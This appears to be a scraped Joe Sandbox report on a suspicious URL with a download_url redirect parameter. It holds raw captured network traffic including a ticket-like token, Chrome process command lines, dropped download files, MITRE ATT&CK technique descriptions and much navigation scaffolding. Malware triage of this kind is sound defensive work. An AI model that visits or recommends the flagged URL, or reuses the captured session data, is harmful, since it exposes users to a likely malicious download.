2024-10-02 16:45:59 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 77 77 31 4c 51 54 65 2f 45 4f 39 55 70 43 38 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 37 64 63 37 36 62 30 63 30 30 33 66 34 31 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 6c 31 66 6c 43 56 36 52 69 75 5a 68 54 67 45 39 71 54 55 53 42 49 30 4c 31 52 33 6c 65 50 46 30 49 45 34 7a 78 61 4d 37 74 7a 56 68 64 36 41 56 42 36 72 2b 75 38 34 55 2f 72 79 2f 72 66 61 6f 6e 6e 42 2b 68 71 56 42 53 39 37 70 48 36 77 51 58 2b 43 58 66 75 34 44 76 4a 6f 43 38 51 54 71 69 36 41 6f 62 5a 72 57 37 6e 39 74 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bww1LQTe/EO9UpC8.2Context: 97dc76b0c003f416<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWl1flCV6RiuZhTgE9qTUSBI0L1R3lePF0IE4zxaM7tzVhd6AVB6r+u84U/ry/rfaonnB+hqVBS97pH6wQX+CXfu4DvJoC8QTqi6AobZrW7n9t
2024-10-02 16:45:59 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 77 77 31 4c 51 54 65 2f 45 4f 39 55 70 43 38 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 37 64 63 37 36 62 30 63 30 30 33 66 34 31 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: bww1LQTe/EO9UpC8.3Context: 97dc76b0c003f416<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-02 16:45:59 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-02 16:45:59 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 58 45 61 53 59 65 45 42 31 55 61 36 4c 4f 4b 53 5a 49 33 4e 62 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: XEaSYeEB1Ua6LOKSZI3Nbg.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5164, Parent PID: 6120

General

Target ID:	0
Start time:	12:44:16
Start date:	02/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4916, Parent PID: 5164

General

Target ID:	2
Start time:	12:44:20
Start date:	02/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2540,i,13889271777353788833,17058743533629641007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6096, Parent PID: 6120

General

Target ID:	3
Start time:	12:44:22
Start date:	02/10/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Downloads\64b19808-2094-4b3b-a526-325965c491a2.tmp

C:\Users\user\Downloads\Unconfirmed 387418.crdownload

Chrome Cache Entry: 44

Chrome Cache Entry: 45

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5164, Parent PID: 6120

General

Chronological Activities

Analysis Process: chrome.exePID: 4916, Parent PID: 5164

General

Chronological Activities

Analysis Process: chrome.exePID: 6096, Parent PID: 6120

General

Chronological Activities

Disassembly

Windows Analysis Report
http://hub-res.selvas.com/market/fatalraid/en/hub.html?download_url=https://meatmsges.com